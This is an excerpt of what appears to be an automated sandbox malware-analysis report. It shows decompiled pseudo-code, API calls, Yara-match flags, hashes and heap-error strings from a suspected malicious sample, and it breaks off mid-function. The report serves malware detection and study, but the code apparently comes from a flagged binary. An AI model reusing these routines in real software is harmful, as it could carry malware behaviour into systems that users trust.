                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                    • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408309 Relevance: 1.6, APIs: 1, Instructions: 57threadwindowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 217 408309-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 226 40835c-40836e PostThreadMessageW 217->226 227 40838e-408392 217->227 228 408370-40838a call 40a480 226->228 229 40838d 226->229 228->229 229->227
                    C-Code - Quality: 74%
                    			E00408309(void* __ebx, void* __fp0, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				int _t13;
				long _t22;
				int _t27;
				void* _t30;
				void* _t32;
				void* _t37;

				_t37 = __ebx + 1;
				asm("in eax, 0x3f");
				[tword [eax-0x74aa3d01] = __fp0;
				_t30 = _t32;
				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				E0041CA00( &_v68, 3);
				_t12 = E0040ACF0(_t37, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t27 = _t13;
				if(_t27 != 0) {
					_t22 = _a8;
					_t13 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t39 = _t13;
					if(_t13 == 0) {
						_t13 =  *_t27(_t22, 0x8003, _t30 + (E0040A480(_t39, 1, 8) & 0x000000ff) - 0x40, _t13);
					}
				}
				return _t13;
			}












                    0x00408309
                    0x0040830a
                    0x0040830c
                    0x00408311
                    0x0040831f
                    0x00408323
                    0x0040832e
                    0x0040833e
                    0x0040834e
                    0x00408353
                    0x0040835a
                    0x0040835d
                    0x0040836a
                    0x0040836c
                    0x0040836e
                    0x0040838b
                    0x0040838b
                    0x0040838d
                    0x00408392

                    APIs
                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: bebf7df2c48c184cd7a25783415ede8887695987a8c51f0c9ad6567920801885
                    • Instruction ID: 9005fe3ccfc6f4faa8a7622fde66627b3cab750b7fa22ab33b26c5d7ccc70407
                    • Opcode Fuzzy Hash: bebf7df2c48c184cd7a25783415ede8887695987a8c51f0c9ad6567920801885
                    • Instruction Fuzzy Hash: 5401D871A8032876E721A6559D43FFE7B2C5B41F54F04015EFF04BA1C1EAA9690643EA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 241 408310-40831f 242 408328-40835a call 41ca00 call 40acf0 call 414e50 241->242 243 408323 call 41be60 241->243 250 40835c-40836e PostThreadMessageW 242->250 251 40838e-408392 242->251 243->242 252 408370-40838a call 40a480 250->252 253 40838d 250->253 252->253 253->251
                    C-Code - Quality: 82%
                    			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				E0041CA00( &_v68, 3);
				_t12 = E0040ACF0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                    0x00408310
                    0x0040831f
                    0x00408323
                    0x0040832e
                    0x0040833e
                    0x0040834e
                    0x00408353
                    0x0040835a
                    0x0040835d
                    0x0040836a
                    0x0040836c
                    0x0040836e
                    0x0040838b
                    0x0040838b
                    0x00000000
                    0x0040838d
                    0x00408392

                    APIs
                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                    • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                    • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                    • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A662 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 280 41a662-41a665 281 41a622-41a62d 280->281 282 41a667-41a687 call 41af60 280->282 285 41a68c-41a6a1 RtlFreeHeap 282->285
                    C-Code - Quality: 35%
                    			E0041A662(void* __eax, signed int __ecx, void* __edx, void* _a4, long _a8, void* _a12) {
				char _v0;
				intOrPtr* __esi;
				signed int _t13;
				intOrPtr* _t16;
				signed int _t18;

				_t13 = __ecx ^ _t18;
				_push(_t13);
				if(_t13 >= 0) {
					return  *((intOrPtr*)( *_t16))(__eax, __edx);
				} else {
					asm("in eax, dx");
					__dh = __dh +  *((intOrPtr*)(__ecx + 0xf));
					asm("cdq");
					asm("adc esp, [eax+0x55]");
					__ebp = __esp;
					__eax = _v0;
					__ecx =  *((intOrPtr*)(__eax + 0x10));
					_t6 = __eax + 0xc74; // 0xc74
					__esi = _t6;
					__eax = E0041AF60(__edi, __eax, __esi,  *((intOrPtr*)(__eax + 0x10)), 0, 0x35);
					__edx = _a12;
					__eax = _a8;
					__ecx = _a4;
					__edx =  *__esi;
					__eax = RtlFreeHeap(_a4, _a8, _a12); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}








                    0x0041a662
                    0x0041a664
                    0x0041a665
                    0x0041a62d
                    0x0041a667
                    0x0041a667
                    0x0041a668
                    0x0041a66d
                    0x0041a66e
                    0x0041a671
                    0x0041a673
                    0x0041a676
                    0x0041a67f
                    0x0041a67f
                    0x0041a687
                    0x0041a68c
                    0x0041a68f
                    0x0041a692
                    0x0041a699
                    0x0041a69d
                    0x0041a69f
                    0x0041a6a0
                    0x0041a6a1
                    0x0041a6a1

                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: 9f7637e8d733c657de828b63c7499d1f7ce2c5b83a62cd3db227495cf57e608f
                    • Instruction ID: 44e973540ae73d37a977c81b5a1ed213c45ba4b46c911f6533b39226ee48d5a8
                    • Opcode Fuzzy Hash: 9f7637e8d733c657de828b63c7499d1f7ce2c5b83a62cd3db227495cf57e608f
                    • Instruction Fuzzy Hash: CFF090B12042046BCB08DFA5DC46EA737A8DF88758F15455DF94D97242D636E821C6A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 289 41a670-41a686 290 41a68c-41a6a1 RtlFreeHeap 289->290 291 41a687 call 41af60 289->291 291->290
                    C-Code - Quality: 100%
                    			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                    0x0041a67f
                    0x0041a687
                    0x0041a69d
                    0x0041a6a1

                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                    • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                    • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    C-Code - Quality: 82%
                    			E0041A7D0(intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr* _t7;
				int _t10;
				intOrPtr _t11;
				void* _t15;

				_t7 = _a4;
				_t11 =  *((intOrPtr*)(_t7 + 0xa18));
				asm("sbb [edx], cl");
				 *_t7 =  *_t7 + _t7;
				E0041AF60(_t15, _t7, _t7 + 0xc8c, _t11, 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}







                    0x0041a7d3
                    0x0041a7d6
                    0x0041a7d8
                    0x0041a7da
                    0x0041a7ea
                    0x0041a800
                    0x0041a804

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                    • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                    • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0041A6B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                    0x0041a6b3
                    0x0041a6ca
                    0x0041a6d8

                    APIs
                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                    • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                    • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A6A2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E0041A6A2() {
				signed int _t7;
				void* _t14;
				signed int _t15;
				signed int _t16;

				_t16 = _t15 | _t7;
				_t9 =  *0x0A7B5596;
				_push(_t16);
				E0041AF60(_t14,  *0x0A7B5596,  *0x0A7B5596 + 0xc7c,  *((intOrPtr*)(_t9 + 0xa14)), 0, 0x36);
				ExitProcess( *0x0A7B559A);
			}







                    0x0041a6a7
                    0x0041a6b3
                    0x0041a6bc
                    0x0041a6ca
                    0x0041a6d8

                    APIs
                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: 4d2ceb84a4e5ed7e6136e5f4e2db85ce7872116a18e43c2d6bcf32d5ada178a4
                    • Instruction ID: 5fd7cd572fb405ca1da9725e338aca22bf470b542788eb82673b98f86406accb
                    • Opcode Fuzzy Hash: 4d2ceb84a4e5ed7e6136e5f4e2db85ce7872116a18e43c2d6bcf32d5ada178a4
                    • Instruction Fuzzy Hash: 97E0C2B1A002047FD220CF58CD85FD73BA99F4C350F018078BD0CAB241C630EA5487E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: b1094e8200c10e2ea0fdd05600a9d2c8c1eeb2f578718816c7923fa5c2f57c40
                    • Instruction ID: e3dc67ce2c9a2dd104a15a71464b10055a2302683962ae66018c35cc8cfea632
                    • Opcode Fuzzy Hash: b1094e8200c10e2ea0fdd05600a9d2c8c1eeb2f578718816c7923fa5c2f57c40
                    • Instruction Fuzzy Hash: 13B02B718010D0C6E601D7A00E087173900BBC0304F22C021D1020640B8338C0C0F6B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 0171B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                    Download Yara Rule
                    Strings
                    • a NULL pointer, xrefs: 0171B4E0
                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0171B323
                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0171B53F
                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0171B305
                    • Go determine why that thread has not released the critical section., xrefs: 0171B3C5
                    • The resource is owned exclusively by thread %p, xrefs: 0171B374
                    • *** Resource timeout (%p) in %ws:%s, xrefs: 0171B352
                    • *** An Access Violation occurred in %ws:%s, xrefs: 0171B48F
                    • *** then kb to get the faulting stack, xrefs: 0171B51C
                    • <unknown>, xrefs: 0171B27E, 0171B2D1, 0171B350, 0171B399, 0171B417, 0171B48E
                    • an invalid address, %p, xrefs: 0171B4CF
                    • *** Inpage error in %ws:%s, xrefs: 0171B418
                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0171B38F
                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0171B39B
                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0171B314
                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0171B2DC
                    • write to, xrefs: 0171B4A6
                    • This failed because of error %Ix., xrefs: 0171B446
                    • read from, xrefs: 0171B4AD, 0171B4B2
                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0171B3D6
                    • The instruction at %p referenced memory at %p., xrefs: 0171B432
                    • The instruction at %p tried to %s , xrefs: 0171B4B6
                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0171B2F3
                    • *** enter .exr %p for the exception record, xrefs: 0171B4F1
                    • The resource is owned shared by %d threads, xrefs: 0171B37E
                    • The critical section is owned by thread %p., xrefs: 0171B3B9
                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0171B484
                    • *** enter .cxr %p for the context, xrefs: 0171B50D
                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0171B47D
                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0171B476
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                    • API String ID: 0-108210295
                    • Opcode ID: ac9b6f538fa667570c2897bfe8cbc97d6fdd84f9783519f284d8dd0ce0634f91
                    • Instruction ID: c38cd80ffd7114cc70b05c20f50110016e55c964f241cc5924df8f4c159fcb04
                    • Opcode Fuzzy Hash: ac9b6f538fa667570c2897bfe8cbc97d6fdd84f9783519f284d8dd0ce0634f91
                    • Instruction Fuzzy Hash: C7810171A40200FFDB226A8ECC85D7BBF36EF56B51F40408CFA062B156D2659951CBB2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01721C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                    Download Yara Rule
                    C-Code - Quality: 44%
                    			E01721C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x16448a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0166B150();
				} else {
					E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x175589c);
				E0166B150("Heap error detected at %p (heap handle %p)\n",  *0x17558a0);
				_t27 =  *0x1755898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01721E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0166B150();
				} else {
					E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0166B150("Error code: %d - %s\n",  *0x1755898);
				_t113 =  *0x17558a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0166B150();
					} else {
						E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0166B150("Parameter1: %p\n",  *0x17558a4);
				}
				_t115 =  *0x17558a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0166B150();
					} else {
						E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0166B150("Parameter2: %p\n",  *0x17558a8);
				}
				_t117 =  *0x17558ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0166B150();
					} else {
						E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0166B150("Parameter3: %p\n",  *0x17558ac);
				}
				_t119 =  *0x17558b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0166B150();
					} else {
						E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x17558b4);
					E0166B150("Last known valid blocks: before - %p, after - %p\n",  *0x17558b0);
				} else {
					_t120 =  *0x17558b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0166B150();
				} else {
					E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0166B150("Stack trace available at %p\n", 0x17558c0);
			}











                    0x01721c10
                    0x01721c16
                    0x01721c1e
                    0x01721c3d
                    0x01721c3e
                    0x01721c20
                    0x01721c35
                    0x01721c3a
                    0x01721c44
                    0x01721c55
                    0x01721c5a
                    0x01721c65
                    0x01721c67
                    0x00000000
                    0x01721c6e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01721c67
                    0x01721cdc
                    0x01721ce5
                    0x01721d04
                    0x01721d05
                    0x01721ce7
                    0x01721cfc
                    0x01721d01
                    0x01721d0b
                    0x01721d17
                    0x01721d1f
                    0x01721d25
                    0x01721d30
                    0x01721d4f
                    0x01721d50
                    0x01721d32
                    0x01721d47
                    0x01721d4c
                    0x01721d61
                    0x01721d67
                    0x01721d68
                    0x01721d6e
                    0x01721d79
                    0x01721d98
                    0x01721d99
                    0x01721d7b
                    0x01721d90
                    0x01721d95
                    0x01721daa
                    0x01721db0
                    0x01721db1
                    0x01721db7
                    0x01721dc2
                    0x01721de1
                    0x01721de2
                    0x01721dc4
                    0x01721dd9
                    0x01721dde
                    0x01721df3
                    0x01721df9
                    0x01721dfa
                    0x01721e00
                    0x01721e0a
                    0x01721e13
                    0x01721e32
                    0x01721e33
                    0x01721e15
                    0x01721e2a
                    0x01721e2f
                    0x01721e39
                    0x01721e4a
                    0x01721e02
                    0x01721e02
                    0x01721e08
                    0x00000000
                    0x00000000
                    0x01721e08
                    0x01721e5b
                    0x01721e7a
                    0x01721e7b
                    0x01721e5d
                    0x01721e72
                    0x01721e77
                    0x01721e95

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                    • API String ID: 0-2897834094
                    • Opcode ID: 6b2e8ca33649a4b8e8d6134dee52ab063ee1dd9c574bf946eba97233fb764506
                    • Instruction ID: 5dee6d4b3f983d0a3d5fc5f5a189b9302af82e731ebf7df9a8d29fcb8b17ce91
                    • Opcode Fuzzy Hash: 6b2e8ca33649a4b8e8d6134dee52ab063ee1dd9c574bf946eba97233fb764506
                    • Instruction Fuzzy Hash: 2E610637A51265EFD751AB89DC84D31F3A9FB04931B4980AEF90A9B300D671ADC28B1D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01724AEF Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 59%
                    			E01724AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E0166B150();
						} else {
